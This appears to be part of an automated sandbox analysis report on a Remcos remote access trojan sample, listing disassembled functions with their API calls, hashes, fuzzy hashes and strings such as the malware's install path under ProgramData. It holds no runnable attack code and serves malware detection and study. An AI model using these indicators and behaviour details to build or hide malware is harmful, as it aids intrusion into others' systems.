                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE95351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE9536F
                                                                                                                                                                                      • Part of subcall function 2DE9571E: HeapFree.KERNEL32(00000000,00000000), ref: 2DE95734
                                                                                                                                                                                      • Part of subcall function 2DE9571E: GetLastError.KERNEL32(?,?,2DE9924F,?,00000000,?,00000000,?,2DE99276,?,00000007,?,?,2DE97E5A,?,?), ref: 2DE95746
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE95381
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE95394
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE953A5
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE953B6
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                    • Opcode ID: f1576c447d235081f5b71ec8968e0f05a53c8945954b335feb04451b987ffc52
                                                                                                                                                                                    • Instruction ID: 6b90a7e7ea3fb7e04e9572b071fa18edb255b1dc1395c82dff557ece5e616ec5
                                                                                                                                                                                    • Opcode Fuzzy Hash: f1576c447d235081f5b71ec8968e0f05a53c8945954b335feb04451b987ffc52
                                                                                                                                                                                    • Instruction Fuzzy Hash: 06F0547682E112DBC6025F6895A06887BF3FB24E14702050AF956B7354DF3909028B98
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE94BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\ProgramData\Remcos\remcos.exe,00000104), ref: 2DE94C1D
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE94CE8
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE94CF2
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$FileModuleName
                                                                                                                                                                                    • String ID: C:\ProgramData\Remcos\remcos.exe
                                                                                                                                                                                    • API String ID: 2506810119-1832081669
                                                                                                                                                                                    • Opcode ID: 9ac420d3859840ff722595867d49ec56a8dd17078ca4d61881e68d31f389a5a1
                                                                                                                                                                                    • Instruction ID: 836efe4f87ad7a074f0d5709cdef24cd001b8f0b6cc0a331c7746d279f86316a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9ac420d3859840ff722595867d49ec56a8dd17078ca4d61881e68d31f389a5a1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 893193B1A06258BFDB12CF998880DDEBBFDEF85714F11405AE904B7300DA708A42CB64
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE986E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,2DE96FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 2DE98731
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 2DE987BA
                                                                                                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 2DE987CC
                                                                                                                                                                                    • __freea.LIBCMT ref: 2DE987D5
                                                                                                                                                                                      • Part of subcall function 2DE956D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 2DE95702
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2652629310-0
                                                                                                                                                                                    • Opcode ID: e45550ee9e795db69a20ff4babedab9c0ea560c7623fca45226efe4ad177f55c
                                                                                                                                                                                    • Instruction ID: d48d64a90a4486a35ba24450d88eddc137da3e93d12bffc66376baf9e8e2f029
                                                                                                                                                                                    • Opcode Fuzzy Hash: e45550ee9e795db69a20ff4babedab9c0ea560c7623fca45226efe4ad177f55c
                                                                                                                                                                                    • Instruction Fuzzy Hash: B231CF72A0221AABDF158F64CC90EFF7BA5EB40614F014168FD14FB260EB39D951DBA0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE963F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE9655C
                                                                                                                                                                                      • Part of subcall function 2DE962BC: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 2DE962BE
                                                                                                                                                                                      • Part of subcall function 2DE962BC: GetCurrentProcess.KERNEL32(C0000417), ref: 2DE962E0
                                                                                                                                                                                      • Part of subcall function 2DE962BC: TerminateProcess.KERNEL32(00000000), ref: 2DE962E7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                                    • String ID: *?$.
                                                                                                                                                                                    • API String ID: 2667617558-3972193922
                                                                                                                                                                                    • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                                                                                    • Instruction ID: 1dd659256a382281737e85d9f7f80b7dff66d3482e8a6d1b66d099e30c5cbc3a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3551B4B5E05289AFDB05CFA8C880AEDBBB5FF58318F15816ED554F7301DA359A018B50
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE916AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _strlen
                                                                                                                                                                                    • String ID: : $Se.
                                                                                                                                                                                    • API String ID: 4218353326-4089948878
                                                                                                                                                                                    • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                                                    • Instruction ID: f639cbf253a49745d8b3d588bb4709cadc66ffcdf3fd8a26a919e6743e31ae57
                                                                                                                                                                                    • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                                                    • Instruction Fuzzy Hash: B011E771A05249AECB11CFA8D840BEDFBFCEF1A218F104056E645F7212EA705B02C7A5
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE91EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 2DE92903
                                                                                                                                                                                      • Part of subcall function 2DE935D2: RaiseException.KERNEL32(?,?,?,2DE92925,00000000,00000000,00000000,?,?,?,?,?,2DE92925,?,2DEA21B8), ref: 2DE93632
                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 2DE92920
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                    • String ID: Unknown exception
                                                                                                                                                                                    • API String ID: 3476068407-410509341
                                                                                                                                                                                    • Opcode ID: 69f89a883e048fc1f1c0ca1b8bd77b4e16475080a4a2ecd82d4eb96ef5a5d67c
                                                                                                                                                                                    • Instruction ID: d7935630d1f0a40c99033fd4771faba4be1baa14908e3360ea2fb65872ed4cb2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 69f89a883e048fc1f1c0ca1b8bd77b4e16475080a4a2ecd82d4eb96ef5a5d67c
                                                                                                                                                                                    • Instruction Fuzzy Hash: DBF0AF3490A20DB7CF05A6A9EC449ED776CEF20690FD0C160EF24B60A1FF31EA26C590
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE969F3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetOEMCP.KERNEL32(00000000,?,?,2DE96C7C,?), ref: 2DE96A1E
                                                                                                                                                                                    • GetACP.KERNEL32(00000000,?,?,2DE96C7C,?), ref: 2DE96A35
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: |l-
                                                                                                                                                                                    • API String ID: 0-3309998742
                                                                                                                                                                                    • Opcode ID: accc4b77421ba299e02779de8751b9585bf52867db144307bfd2776f8ede9fdf
                                                                                                                                                                                    • Instruction ID: 92390b92bea9ff62b2206937f0ffb1b7fd131332019d252895472769f07385dc
                                                                                                                                                                                    • Opcode Fuzzy Hash: accc4b77421ba299e02779de8751b9585bf52867db144307bfd2776f8ede9fdf
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9DF0C271401689CFD700DBA4C448BEC77B1FB00739F10834AE479AA2D1DFB59945CB44
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE97103 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CommandLine
                                                                                                                                                                                    • String ID: ,l
                                                                                                                                                                                    • API String ID: 3253501508-2567230017
                                                                                                                                                                                    • Opcode ID: a3b8b11018f03a13b574be291074414d2d7e85d7b707b0505c61f4f3d971a0ed
                                                                                                                                                                                    • Instruction ID: f5c95a24f4a172dbe8fb89cdf2b907218632a36ab002a8bedb8c206f72fa4905
                                                                                                                                                                                    • Opcode Fuzzy Hash: a3b8b11018f03a13b574be291074414d2d7e85d7b707b0505c61f4f3d971a0ed
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6DB0487E8122118BC7048FB091292C83BF6A348A02780405BD54B82B00D63C9046AA28
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%